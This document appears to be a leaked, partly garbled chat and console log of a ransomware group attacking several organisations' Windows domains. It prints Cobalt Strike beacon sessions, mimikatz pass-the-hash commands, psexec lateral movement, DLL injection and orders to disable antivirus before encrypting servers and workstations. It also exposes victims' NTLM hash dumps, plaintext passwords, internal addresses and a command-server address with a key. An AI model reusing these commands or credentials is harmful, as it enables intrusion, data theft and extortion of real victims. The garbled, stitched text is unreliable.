[*] Tasked beacon to run: copy x64.dll \\192.168.100.227\C$\ProgramData\x64.dll
[+] host called home, sent: 84 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.
```
pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
```
beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \\.\pipe\cb0f70" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : aandaservice
domain  : sprouselaw
program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  9896
  |  TID  936
  |  LSA Process is now R/W
  |  LUID 0 ; 1695752222 (00000000:6513201e)
  \_ msv1_0   - data copy @ 0000027541E22080 : OK !
  \_ kerberos - data copy @ 0000027541F15C08
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000002754218FAE8 (32) -> null
```
```
user    : aandaservice
domain  : SPROUSELAW.COM
program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  19196
  |  TID  15936
  |  LSA Process is now R/W
  |  LUID 0 ; 575605488 (00000000:224f0af0)
  \_ msv1_0   - data copy @ 000001FD13FD6080 : OK !
  \_ kerberos - data copy @ 000001FD13E24C88
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001FD13F107E8 (32) -> null
```
pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
```
The referenced account is currently locked out and may not be logged on to.
```
pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c
lines 19 through 37, from 192.168.100.227 to 192.168.100.89
https://ru.malwarebytes.com/business/endpoint-protection/
cavona kmd5 both
```
by5183 dustintp c2a23920677e464f359320c23947c237
5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58
66048
```
friends who are out of work or sitting in dead-ends - throw your dll
where?
Lekha shalom
Morning in the hut, comrades!
today Vova
o Semyon hello
Day
Day, what grids will work?
user3 will try
and by the way, did not pass?
user3 Add plz
@user3 he'll take it from here.
I'll try poking around in the code, maybe you have some?
No, I can't find an alternative to SharpPrinter and no other implementations?
```
Unhandled Exception: Unhandled Exception: System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)
   at SharpPrinter.Program.SendArpRequest(IPAddress dst)
   at SharpPrinter.Program.<>c__DisplayClass6_0.b__0()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()
System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)
```
There must be something in the code
printers to compile the hashnik, it doesn't work
citrix no printers
citrix
description?
AD what exactly?
gpp empty, AD?
What else can I try?
No progress so far
no rights up
17-010 empty
xp all ports are closed but pinged
ftp is empty
sql is not online
lockout is zero, ran a storm with passwords found - nothing
no passwords in files and shares
no kerbs
there is no username anywhere - no password - no kerbs
10.0 name: SS-KBRYMER domain: SilencerShop) 192.168.1.166:445 (platform: 500 version: 10.0 name: SS-KATE domain: SilencerShop) 192.168.1.168:445 (platform: 500 version: 10.0 name: SS-FPTSCAN domain: SilencerShop) 192.168.1.169:445 (platform: 500 version: 10.0 name: SS-MORTEGA domain: SilencerShop) 192.168.1.186:445 (platform: 500 version: 10.0 name: SS-ANDERS domain: SilencerShop) 192.168.1.207:445 192.168.1.214:445 (platform: 500 version: 10.0 name: SS-KCROSS domain: SilencerShop) ``session crashed win 10 2004 - failed to get up (not LA) shuffliner is not LA anywhere else whining is not online ftp is there but nothing worked one xp, but all ports are closed nothing online under 17-010 started scanning sharpPrinter and flew away all the rest what can kerbs no and citrix, kerbs? he is nowhere else lav files also nothing but the password polozakapolzak not la, unlikely to get up there is 1 xp, but all ports are closed all okrch lagging?) hang them up, if you see that they recover - finish it = )from here a couple of sessions came with fsrv and dk - the rdmi is1.done.lrhc.org0.done.lrhc.org and on to #genralThat's it, let's wrap it up. 
enter + 1 additional net[ ](https://mediaeveryone.com/group/lrhc-org?msg=4vFvHrAH6kSgf5ekp) will not come out, no internet so far in difficilepo classics disassemble and workupon give you a cobu where will fly sessions we have a little time to talk about the process that I'm not particularly happy servers: 5/7 (2 were not attracted) armas: servers flew away fast, no time to map Now for the process, let's keep this format for the future mcklrh.mig servers: 6/6 Armas: 15 masked, not yet encrypted ffmg.local servers: 1/3 (1 did not attract, 1 no kred, not allowed even YES) armas: not zamapi ELEAH.LOCAL servers: 5/7 (2 were not attracted) Armies: Servers flew away quickly, no time to map lrhc.local servers: 171/175 (4 not attracted or mapped, no disks/balls visible) armas: 791/1040 mapped, cipher in question ´´Well, there are approximate stats not yet? what? contact @ot us router is connecting to the wpn, what's the problem? reboot what? reboot what? @tl1? we have office proxy failed - we cobbed and ready, now we're completing the status what? minutes1 left to get one and a half domains? so what? `ffmg.local\petekuttera e65e7043f9e8c2321284f39e830a51ba`FFMG\Administrator Lexapro421!oxa`mapped to LRHDC02 one and a half domains left to get the scale of the tragedyDescribe the intermediate result10.10.70.5 - mask disks c,d,e on the dk+on the dk, there are still not allowed to do soIs it possible to pull on a blocked server and run the inject on a new one will work? we have several scenarios or shut off AVproblem mapped to another server? 
does not break his dlk and exeсheck why not block the server `` `` +] received output: Host Name: LRH-WDS01 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User ``` ``` Name Version Sophos Network Threat Protection 1.10.1051.0 Sophos Anti-Virus 10.8.9.610 Sophos Endpoint Self Help 3.0.217.0 Sophos AutoUpdate XG 6.6.144.0 Sophos Health 2.4.7.0 AppRecovery Agent 6.4.0.718 Sophos Endpoint Agent 2.0.423.0 Sophos Diagnostic Utility 6.5.238.0 Sophos Endpoint Firewall 1.2.0.17 6.1.1.28093 Sophos File Integrity Monitoring 1.0.1.11 If not, if it's not hanging, then the crypt is going on. Check the pid session, skip the ones that fell off while we're working on it. I'll clarify, the file is the first to fall and the crypt is in the next hour if the file appears but the session is dead? Directory of \10.10.30.211$ 06/21/2019 10:29 AM 0 CLRtypes.txt 12/21/2020 02:55 AM Downloads 12/21/2020 06:00 AM 278 ErrorLog.xml 12/21/2020 02:55 AM inetpub 12/21/2020 02:55 AM 849 LABEL_rhollis.txt.PXILP 12/21/2020 02:55 AM Logs 06/21/2019 10:22 AM 0 msxml.txt 07/09/2017 10:03 AM PerfLogs 12/21/2020 02:55 AM Program Files 12/21/2020 02:55 AM Program Files (x86) 12/21/2020 02:55 AM Quarantine 12/21/2020 02:55 AM 1,495 readme.txt 07/02/2019 01:59 PM 0 TW.txt 07/02/2019 01:59 PM 0 TW2.txt 12/21/2020 05:56 AM Users 12/21/2020 05:56 AM Windows 7 File(s) 2,622 bytes 9 Dir(s) 32,827,768,832 bytes free ``kill the av and bang the ehhe reopen and if not alive? If you forget the sessions after the inject should be alive I have my damamil on topnot see the popo and other things maxima`` `` [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 195572 bytes [+] received output: Injected. 
[+] host called home, sent: 19 bytes [+] host called home, sent: 20 bytes ``I've opened 3 of the green servers to choose from marim armaments on it inject move on to the next one, someone write down the algorithm that you work out? I do not have a question is relevant I have not finished the last word) where is the logic? ``You guys in my coba have a problem with the massinject? ` ` Encrypting the servers `[ ](https://mediaeveryone.com/group/lrhc-org?msg=vnoWXKwqYYFZuN737) [ ](https://mediaeveryone.com/group/lrhc-org?msg=NBDJ4mz4rwxMXPhgm) `` ``Forget the answerI answered you above or I don't understand somethingIs the guys in my coba having problems with the array? ok[ ](https://mediaeveryone.com/group/lrhc-org?msg=oarSXwdaXmqpFuTXS) forgot to put `- )o worked outSafetyIbahe.If he himself doesn't want to mask his drives on another serverIs the guys in my coba what are you doing? Volume in drive C is OS Volume Serial Number is 584E-4F0A Directory of C:\ 07/13/2009 09:20 PM PerfLogs 02/10/2018 10:06 AM Program Files 10/07/2019 08:20 PM Program Files (x86) 10/16/2017 10:36 AM Quarantine 01/06/2014 02:45 PM temp 06/08/2018 07:52 AM Users 08/20/2020 08:12 PM Windows 0 File(s) 0 bytes 7 Dir(s) 50,698,219,520 bytes free ``and give me more dir C:\to try and change the dir+rights of the system? Host Name: LRHPROFILES2 OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-262-0784995-84931 Original Install Date: 5/24/2011, 9:39:37 PM System Boot Time: 2/13/2020, 9:16:14 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. 
[01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-06:00) Central Time (US & Canada) Total Physical Memory: 4.096 MB Available Physical Memory: 2,107 MB Virtual Memory: Max Size: 8,189 MB Virtual Memory: Available: 4,599 MB Virtual Memory: In Use: 3,590 MB Page File Location(s): C:\pagefile.sys Domain: lrhc.local Logon Server: N/A Hotfix(s): 128 Hotfix(s) Installed. [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB2764913 [07]: KB2764916 [08]: KB2718695 [09]: KB977239 [10]: KB2670838 [11]: KB981390 [12]: KB2425227 [13]: KB2446710 [14]: KB2484033 [15]: KB2497640 [16]: KB2503658 [17]: KB2506014 [18]: KB2506212 [19]: KB2506223 [20]: KB2506928 [21]: KB2507618 [22]: KB2508272 [23]: KB2508429 [24]: KB2509553 [25]: KB2510531 [26]: KB2511250 [27]: KB2511455 [28]: KB2515325 [29]: KB2522422 [30]: KB2524375 [31]: KB2533552 [32]: KB2533623 [33]: KB2534366 [34]: KB2536275 [35]: KB2536276 [36]: KB2541014 [37]: KB2544893 [38]: KB2545698 [39]: KB2547666 [40]: KB2552343 [41]: KB2560656 [42]: KB2563227 [43]: KB2564958 [44]: KB2570947 [45]: KB2584146 [46]: KB2585542 [47]: KB2603229 [48]: KB2604115 [49]: KB2607047 [50]: KB2608658 [51]: KB2618451 [52]: KB2620704 [53]: KB2621440 [54]: KB2631813 [55]: KB2639308 [56]: KB2640148 [57]: KB2643719 [58]: KB2645640 [59]: KB2647753 [60]: KB2653956 [61]: KB2654428 [62]: KB2655992 [63]: KB2656356 [64]: KB2660075 [65]: KB2667402 [66]: KB2676562 [67]: KB2685811 [68]: KB2685813 [69]: KB2685939 [70]: KB2690533 [71]: KB2691442 [72]: KB26698365 [73]: KB2699779 [74]: KB2705219 [75]: KB2706045 [76]: KB2709630 [77]: KB2712808 [78]: KB2718704 [79]: KB2719857 [80]: KB2726535 [81]: 
KB2729094 [82]: KB2729452 [83]: KB2731771 [84]: KB2732059 [85]: KB2742599 [86]: KB2743555 [87]: KB2750841 [88]: KB2753842 [89]: KB2757638 [90]: KB2758857 [91]: KB2761217 [92]: KB2763523 [93]: KB2765809 [94]: KB2770660 [95]: KB2785220 [96]: KB2786081 [97]: KB2786400 [98]: KB2789645 [99]: KB2791765 [100]: KB2798162 [101]: KB2804579 [102]: KB2807986 [103]: KB2808679 [104]: KB2813347 [105]: KB2813430 [106]: KB2820197 [107]: KB2820331 [108]: KB2830290 [109]: KB2833946 [110]: KB2834140 [111]: KB2834886 [112]: KB2839894 [113]: KB2840149 [114]: KB2844286 [115]: KB2849470 [116]: KB2850851 [117]: KB2859537 [118]: KB2861855 [119]: KB2862772 [120]: KB2862966 [121]: KB2863058 [122]: KB2868623 [123]: KB2999226 [124]: KB3154518 [125]: KB4019990 [126]: KB4499175 [127]: KB976902 [128]: KB976932 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es). [01]: 10.10.39.142 [02]: fe80::f9c5:bb23:5d30:3177 ``Av offc:\Windows\Temp all off? where did you start it from? ehversion of the oda updated the same nonsense I'm updating the exeshnik version of the Inge?i can't even see it after a while no udmifile null injected normal workwhy is it possible you have 3 more trusts on top and you went minus 40 mins if the coba was cut off more likely already know about you in tempeokm retract, retract and immediately put if you do not use sessions and they knock every 5 sec you imagine what noise you create? 
if you mapped under token change it and maps should be saved retract `` 10.10.30.173 10.10.30.175 10.10.30.176 10.10.30.177 10.10.30.180 10.10.30.183 10.10.30.196 10.10.30.206 10.10.30.208 10.10.30.210 10.10.30.211 10.10.30.212 10.10.30.222 10.10.30.223 10.10.30.225 10.10.30.226 10.10.30.230 10.10.30.231 10.10.30.244 10.10.30.245 10.10.30.246 10.10.30.247 10.10.30.248 10.10.30.249 10.10.31.70 10.10.37.11 10.10.39.18 10.10.39.40 10.10.39.68 10.10.39.83 10.10.39.85 10.10.39.149 10.10.39.179 10.10.39.180 10.10.39.181 10.10.39.184 10.10.39.186 10.10.39.187 10.10.70.5 169.254.0.2 169.254.0.2 172.23.15.10 you were supposed to be in the trusts for an hour then we're done in the other session, you were kicked out? beacon> make_token lrhc.local\nmsapps dragon374 [*] Tasked beacon to create a token for lrhc.local\nmsapps [+] host called home, sent: 46 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> shell net use * \\10.5.68.221\C$ [*] Tasked beacon to run: net use *\\10.5.68.221\C$ [+] host called home, sent: 57 bytes beacon> shell net use * \\10.10.222.20\C$ [*] Tasked beacon to run: net use * \\10.10.222.20\C$ [+] host called home, sent: 58 bytes beacon> shell net use * \\10.5.68.99\C$ [*] Tasked beacon to run: net use *\\\10.5.68.99\C$ [+] host called home, sent: 56 bytes beacon> shell net use * \\10.91.18.115\C$ [*] Tasked beacon to run: net use *\\\10.91.18.115\C$ [+] host called home, sent: 58 bytes beacon> shell net use * \\10.5.68.119\C$ [*] Tasked beacon to run: net use *\\\10.5.68.119\C$ [+] host called home, sent: 57 bytes beacon> shell net use * \\10.10.220.140\C$ [*] Tasked beacon to run: net use *\\10.10.220.140\C$ [+] host called home, sent: 59 bytes beacon> shell ping 10.10.220.140 [*] Tasked beacon to run: ping 10.10.220.140 [+] host called home, sent: 49 bytes beacon> shell dir C:\ [*] Tasked beacon to run: dir C:\ [+] host called home, sent: 38 bytes ``Don't touch them, they have my sessions. Take them. 
192.254.69.178:25674 VwboHyBv8QTsyelrIDPOEJ2Ee99JlhyiCK4 ``Compyping* from the second koba is pinged on all kobas and even trusts? Apparently our koba was cut offSessions is slacking on this server drop everything by hand to put the ehe very interesting OS, process list, edr, available RAMfeedback to the tulchan [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 217711 bytes [-] relocation truncated to fit (distance between executable code and other data is >4GB) ``then there is a reverse order here, more likely the client itself has not updated the polisy cloud, there is no polisy updatkak and vindef actually did you update it polisy on the clients? sohos is still chopped, although it seems disabledwhy? no, had to armas mapit you already moved to trusts? all pulled up share username=C:/ and if via disk then stop processes and services and unshare them yourself if vmic works) `` `` beacon> portscan 10.10.30.57 3389 [*] Tasked beacon to scan ports 3389 on 10.10.30.57 [+] host called home, sent: 93405 bytes [+] received output: (ICMP) Target '10.10.30.57' is alive. [read 8 bytes] 10.10.30.57:3389 Scanner module is complete ``Check for generalrdp disks? beacon> jump psexec 10.10.30.57 pipe [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 10.10.30.57 via Service Control Manager (\\10.10.30.57\ADMIN$\22adc14.exe) [+] host called home, sent: 287864 bytes [-] could not upload file: 64 [-] Could not start service 22adc14 on 10.10.30.57: 64 [-] Could not connect to pipe: 64 ``bindpipe is fighting? Not even a c$...`` beacon> shell wmic /node:10.10.30.57 share get caption,name,path [*] Tasked beacon to run: wmic /node:10.10.30.57 share get caption,name,path [+] host called home, sent: 201 bytes [+] received output: No Instance(s) Available. ``or even ѕhare request balls via get share from mikane fs? lrhppathif.lrhc.local ``What's the host? ``10.10.30.57 is still in process Didn't you already delete the snaps? 
beacon> execute-assembly SharpSharesNG.exe shares 10.10.30.57 [*] Tasked beacon to run .NET program: SharpSharesNG.exe shares 10.10.30.57 [+] host called home, sent: 129223 bytes [+] received output: ******* COMPLETE ******* ``` ``` beacon> shell wmic /node:10.10.30.57 OS get NAME [*] Tasked beacon to run: wmic /node:10.10.30.57 OS get NAME [+] host called home, sent: 185 bytes [+] received output: Name Microsoftr Windows Serverr 2008 Standard |C:\Windows|\Device\Harddisk0\Partition1 ``build up with sessions and then where not disconnect or go if there is a possibility to disconnect avs - always better through disconnect avs after serverrr then you can through psec disconnect avs disconnect avs what decided to do? disconnect avs or map? since admin is) well then it makes sense to chop[ ](https://mediaeveryone.com/group/lrhc-org?msg=yD93e8s4vCEPza2mv) was kindaadmin from sofos no? dk in all domains in the last place the biggest network we had at this stage only here in the tone do it all first pull and map then start everywhere elsehowever no 100 pulled and mapped then start 100 in all 4? sofosMap and start immediately?and what is the av by the way7 then map the disks of the server and then run the builddrival pids and services are those responsible for the database or wiem for example because the hold is not taken off the network from busy filesnado chop services and pidservers that are not attractedbuild out then pull servers map the armies so if it flew into the block not to lose all at oncesessions from the first 3 to 1 kobu not pull in the first 3 domains open sessions and prepare accesses YES to work and start with the last because he is the biggesttut classics 1 kobu 100 servers worked from two with this network how many you have only kobu?`ELEAH.LOCAL` 17 servers 541 armies `ffmg.local` 9 servers 237 armies `mcklrh.mig 14 servers 46 armies `lrhc.local` 289 servers 2,638 armas almost half an hour we have not even begun to give status on all domains. 
how many servers and armas `APOfi98h&T6GHUs(&*fgTWE` I SharpShares rewrote a little, so they scansharfinder? scan subnets from sabinets - looking for where the admin admin Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- ADM/Domain Admins Administrator The command completed successfully. ``fucking LOCALGROUP administrators because you screwed up beacon> shell net group administrators [*] Tasked beacon to run: net group administrators [+] host called home, sent: 55 bytes [+] received output: This command can be used only on a Windows Domain Controller. More help is available by typing NET HELPMSG 3515. ``It's strange that la doesn't show...EA doesn't show, LA doesn't showDC``. ADMINDC5 10.0.61.13 ADMINDC1 10.0.61.2 ADMINDC3 10.0.61.6 ADMINDC4 10.0.61.7 ADMINDC2 10.0.61.10 SPOCK 10.7.51.3 AZUREDC1 10.221.32.4 ``DA``. administrator ad-script avamar backup bross CGSUMBUser ciscowireless citrixdb clusteradmin id-automation idautosupport installsvcs kaceinstaller ldelar mandl mherna02 munis munis2 munis3 mzuvan nsuser odomin papercut pgalde philipldap SAM sccmadmin sccmagent sccmsvc sisdservice sqlfc support tylerdfs tylerservice tylersisbackup umra-admin vdivmm webadmin ``net accounts Force user logoff how long after time expires?: Never Minimum password age (days): 30 Maximum password age (days): 999 Minimum password length: 6 Length of password history maintained: 3 Lockout threshold: Never Lockout duration (minutes): 30 Lockout observation window (minutes): 30 Computer role: BACKUP The command completed successfully. 
``Good job, good job,`` [DC] 'mcklrh.mig' will be the domain [DC] 'raddc02.mcklrh.mig' will be the DC server [DC] Exporting domain 'mcklrh.mig' 1001 SUPPORT_388945a0 6f033587ef18aa7281931967f8260e1015 66050 1616 nelson 2d7f1a5a61d3a96fb5159b5eef17adc6 514 1612 tech fbc52e18292b500a3b5a1982e19360d0 514 1151 test2 56ad694bdd191d54b6a49fc7e51d611c 514 1155 test4 28bb5d82dfe78e456c9a4f7c588c8727a 514 1168 t_winacc 71b43a8306d1bb60e84a0bc2400a5a21 512 1204 draugdahl 71b43a8306d1bb60e84a0bc2400a5a21 512 1225 drpearson 71b43a8306d1bb60e84a0bc2400a5a21 512 1229 drschmidt 71b43a8306d1bb60e84a0bc2400a5a21 512 1231 drtraiser 71b43a8306d1bb60e84a0bc2400a5a21 512 1239 mgblaplante 71b43a8306d1bb60e84a0bc2400a5a21 512 1244 drbusian 71b43a8306d1bb60e84a0bc2400a5a21 512 1247 drhenry 71b43a8306d1bb60e84a0bc2400a5a21 512 1249 drmcfarlane 71b43a8306d1bb60e84a0bc2400a5a21 512 1252 drstephens 71b43a8306d1bb60e84a0bc2400a5a21 512 1685 jastokfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1689 jdricksn 71b43a8306d1bb60e84a0bc2400a5a21 512 1680 drwernecke f648163703e6c08e66e778c9fcf1c695 512 1256 dmandemu 71b43a8306d1bb60e84a0bc2400a5a21 512 1699 tmtomhmu 71b43a8306d1bb60e84a0bc2400a5a21 512 1701 r_rollhs 71b43a8306d1bb60e84a0bc2400a5a21 512 1716 jjgreged 71b43a8306d1bb60e84a0bc2400a5a21 512 1717 rliverfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1258 V_vanwsn 71b43a8306d1bb60e84a0bc2400a5a21 512 1262 amandamarthaler 71b43a8306d1bb60e84a0bc2400a5a21 512 1263 amysievert 71b43a8306d1bb60e84a0bc2400a5a21 512 1266 annetteellingson 71b43a8306d1bb60e84a0bc2400a5a21 512 1274 debschneider 71b43a8306d1bb60e84a0bc2400a5a21 512 1279 hollythompson 71b43a8306d1bb60e84a0bc2400a5a21 512 1281 jerimitchell 71b43a8306d1bb60e84a0bc2400a5a21 512 1283 jillbrethorst 71b43a8306d1bb60e84a0bc2400a5a21 512 1288 kathithompson 71b43a8306d1bb60e84a0bc2400a5a21 512 1289 katrinajohnson 71b43a8306d1bb60e84a0bc2400a5a21 512 1294 margaretmoore 71b43a8306d1bb60e84a0bc2400a5a21 512 1295 marilynewan 71b43a8306d1bb60e84a0bc2400a5a21 512 
1296 maryfredrickson 71b43a8306d1bb60e84a0bc2400a5a21 512 1306 sherrimaanum 71b43a8306d1bb60e84a0bc2400a5a21 512 1307 sonyakelly 71b43a8306d1bb60e84a0bc2400a5a21 512 1314 vickirode e813a6c841263e9cf4127f2eb34f7cda 512 1318 glstabsn 71b43a8306d1bb60e84a0bc2400a5a21 512 1319 lanerrfp 71b43a8306d1bb60e84a0bc2400a5a21 512 1320 sjnelson 71b43a8306d1bb60e84a0bc2400a5a21 512 1248 drkobriger 81b11bc140d8511fea3f1a627bc5069d 512 1112 calibrate 7e4026687ad6be0a6d736f1fabc8bc16 66048 1718 njolson 45a3cb98d159490c48e9add320b2754a 512 1260 betseypetersen 5af6ca259ee8bf3f44ec14900435a0a2 512 1195 cgtysver fa7d5249b9eaee7735cd74b7621d3c7f 512 1729 c_grafrc 71b43a8306d1bb60e84a0bc2400a5a21 512 1730 njjohnson e813a6c841263e9cf4127f2eb34f7cda 512 1735 tadebrito 71b43a8306d1bb60e84a0bc2400a5a21 512 1737 jwachlarowicz 71b43a8306d1bb60e84a0bc2400a5a21 512 1739 drkimoffice 71b43a8306d1bb60e84a0bc2400a5a21 512 1652 plwiczek 718cbf401001bbfd8fedda9dc078af6 512 1713 jmlien d76c4dbb99f9fe336e7634cfc0fd5d7b 512 1723 jjongeward 656e2f0fb9f108bb7008d5e6e57ac973 512 1329 dnheskin 71b43a8306d1bb60e84a0bc2400a5a21 512 1733 ckmaucrc 11c256333da14053ffb516f84c7876c4 512 1726 j_blonrc 2bd91c2112b3895a356dc850d6ed1acd 512 1700 ndhellhs ba7cabf4467a8145d97d787dd386d888 512 1224 drona 006c00f6d6e35bdc75c69989060399c2 512 1741 drsell c7bad7d1cc2f3c69adea5ccb429234ad 512 1719 swancma 82cd2c655e2f5c0d096181faa5d9c54e 512 1172 nyhukjmu 789cc4b71ce5c2391956ac1df34ddd93 512 1673 edmgr 4b6d381d8bf53c5be1620293ceccacf3 512 1709 mahansed 9d79f63d8560fc299e5daeb07f0bccdf 512 1191 kjswanson 71b43a8306d1bb60e84a0bc2400a5a21 514 1760 h_billor 71b43a8306d1bb60e84a0bc2400a5a21 512 1728 mabakker 3fed67f37553c237ba0e3506ab7722d1 512 1334 patriciatell 71b43a8306d1bb60e84a0bc2400a5a21 514 1683 sdkroged 2bd09797bbcd1cb0c56b800b99b374fe8 512 1326 drovervold 71b43a8306d1bb60e84a0bc2400a5a21 512 1336 aefrank 71b43a8306d1bb60e84a0bc2400a5a21 512 1338 neflinck 71b43a8306d1bb60e84a0bc2400a5a21 512 1341 kjthompson 
71b43a8306d1bb60e84a0bc2400a5a21 512 1342 hmanderson 71b43a8306d1bb60e84a0bc2400a5a21 512 1345 tanyaconroy 71b43a8306d1bb60e84a0bc2400a5a21 512 1347 debthom 71b43a8306d1bb60e84a0bc2400a5a21 512 1768 kimborgus 71b43a8306d1bb60e84a0bc2400a5a21 514 1724 drludwig 6db862a3e5993ea3245de09f7c560d5f 512 1714 uhlialed c1d60fccbdc09924681b9cf859ad1eeb 512 1740 drwoolner c36e58e7931f4dfbf68dd4e583ec39b1 512 1770 seedwafp 71b43a8306d1bb60e84a0bc2400a5a21 512 1771 banelson 71b43a8306d1bb60e84a0bc2400a5a21 512 1772 mwbabcock 71b43a8306d1bb60e84a0bc2400a5a21 512 1267 barbarabecker 014631dff7c5641f56b1264ce44b9e86 512 1677 n_saxed 5f998160d5a5c5771cbba046f9ecb191 512 1357 bjwasved 71b43a8306d1bb60e84a0bc2400a5a21 512 1276 dianeskistad b0d18851aaddc665883a0c2fc3eb1f95 512 1346 theresakallstrom 71b43a8306d1bb60e84a0bc2400a5a21 512 1653 rlswanson f08eaf4b67a44f9db354e7c0b6fc5437 512 1687 lmlundfp 85dd1a8770bd756de08b696064775da3 512 1192 lcundssu 71b43a8306d1bb60e84a0bc2400a5a21 512 1766 drvanderhagen 555f7cd2e083212e14b921c6d6eafff1 512 1360 petersm 612dcf80df63db5bd313d16e235e7e37 512 1774 holewam 3f1e1f48a52790b07fc8f7f78fd1896d 512 1674 ksgilbed 31d05994bf7883f4d452dd8a9f1f54 512 1780 kimkugler 71b43a8306d1bb60e84a0bc2400a5a21 512 1781 megangriep 71b43a8306d1bb60e84a0bc2400a5a21 512 1779 nelssjcs b7496bd41da213cb86be83810f061dde 512 1366 dremokpae 71b43a8306d1bb60e84a0bc2400a5a21 512 1353 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512 1328 dsniklrc 71b43a8306d1bb60e84a0bc2400a5a21 514 1210 drhaeberlin 71b43a8306d1bb60e84a0bc2400a5a21 514 1361 howelam 71b43a8306d1bb60e84a0bc2400a5a21 514 1637 sbklein 45bd8db3b86d6a8b84fe7207cf2947ed 514 1184 ajmarfsu 860e03409ab78f44104caedfdc8828cf 512 1268 beverlyswanson 413995a825f8b6a0e5a834b0bdb47e83 512 1786 todd.test 782d1e5173aa367fe33e7e053beb33056 66080 1200 jlolson c3fb49594fecd04eb9f48f7ba427bda8 514 1712 dmwoldhs 57f3f7aa8bc515d493f9be1e451ad62a 512 1234 drwambach 0c4913e8c53fe4b010dfa6912537259d 512 1790 drakahara 
48a83263e1c057daea02a7cb8e176eb0 512 1214 drkowitz 0172551e7970180b30fc40c267022f90 512 1670 aenorling 1f65c8fe7ee03766746f7bf6a2660326 512 1752 harsjlfp 59d6671166815ebb331ec92c8d0d6fd0 512 1676 l_roched cf42d09286c840daa07184cfb88c2b0d 512 1782 drbrady b22ac831efdbed50fd58d999b85901a5 512 1169 jeskilcc 71b43a8306d1bb60e84a0bc2400a5a21 512 1694 c_grotmu 83aa2cee51e1820b81117b7b24ea1277 512 1794 srwolemn 71b43a8306d1bb60e84a0bc2400a5a21 512 1213 drjoo 3a8413d12bee65e418af57e98a50ce401 512 1331 kmcarlson 71b43a8306d1bb60e84a0bc2400a5a21 512 1343 blfinksu 71b43a8306d1bb60e84a0bc2400a5a21 512 1645 maseivxr 0f1441e83d371915a7d51d151eae4e0f 512 1380 drm 71b43a8306d1bb60e84a0bc2400a5a21 512 1704 j_hallmu e79ff7c7b9a43a4f8f90373a22473330 512 1384 kmkoep 71b43a8306d1bb60e84a0bc2400a5a21 512 1385 seanmcdonald 9b908fe25801a0c4b58fbe51356c5511 512 1793 drjamison 42286d96f65b34de624c721fc0811e 512 1387 drdorr 71b43a8306d1bb60e84a0bc2400a5a21 512 1804 drnammour 71b43a8306d1bb60e84a0bc2400a5a21 512 1803 